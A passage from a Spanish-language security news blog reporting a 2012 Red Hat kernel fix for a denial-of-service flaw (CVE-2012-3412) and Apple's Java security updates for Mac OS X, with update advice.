Red Hat ha publicado una actualización del kernel para toda la familia Red Hat Enterprise Linux 6 que solventa una vulnerabilidad que podría ser aprovechada por un atacante para provocar denegaciones de servicio. 

El fallo, considerado como importante (con CVE-2012-3412), se ha encontrado en la forma en que los búfers de sokets (skb) que requieren TSO (TCP segment offloading) son tratados por el driver sfc. Si el skb no se ajusta con el tamaño mínimo de la cola de transmisión, la tarjeta de red se reiniciará a sí misma de forma repetida. Un atacante remoto podría emplear este problema para provocar denegaciones de servicio.

Además se han solucionado otros fallos de menor importancia. Ésta actualización está disponible desde Red Hat Network.

Más información:

Important: kernel security and bug fix update


Antonio Ropero
Twitter: @aropero

jueves, 18 de octubre de 2012

Actualizaciones de seguridad de Java para Apple Mac OS X

Apple ha lanzado nuevas actualizaciones de seguridad de Java para su sistema operativo Mac OS X que solventa hasta 20 vulnerabilidades que podrían ser aprovechadas con diversos efectos.

Esta es actualización afecta a las versiones Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7 (o posterior), OS X Lion Server v10.7 (o posterior), OS X Mountain Lion v10.8 (o posterior). Las vulnerabilidades corregidas corresponden a la versión 1.6.0_25 de Java que ahora queda actualizado a la 1.6.0_27.

Las vulnerabilidades corregidas son de diversa gravedad, sin embargo tal y como avisa Apple la más seria permite a un applet no fiable ejecutar código arbitrario fuera de la sandbox. Visitar una página web que contenga un applet maliciosamente creado podría dar lugar a la ejecución remota de código con los privilegios del usuario. No está de más recordar que en la actualidad gran parte de las infecciones por troyanos bancarios es una máquina virtual Java desactualizada.

Por otra parte, esta última actualización de Java para OSX ya no solo desactiva el plugin en el navegador, sino que lo desinstala en todos los navegadores. Para usar los applets en una página aconseja a los usuarios pulsar en la zona marcada como "Missing plug-in" para descargar la última versión del plug-in directamente desde Oracle.

También cabe destacar que en esta ocasión Apple ha publicado la actualización bastante rápido. Tan solo han transcurrido un par de días desde el lanzamiento de la versión oficial por parte de Oracle. Cuando frecuentemente solían transcurrir semanas para que Apple actualizara sus propios paquetes.

Las actualizaciones pueden ser instaladas a través de la funcionalidad de actualización (Software Update) de Mac OS X o, según versión y plataforma, descargándolas directamente desde:

Más información:

About the security content of Java for Mac OS X 10.6 Update 11 and Java for OS X 2012-006

About Java for OS X 2012-006

una-al-dhttp://support.apple.com/kb/DL1572ia (06/08/2012) Si no actualizas Java, estás infectado



Antonio Ropero
Twitter: @aropero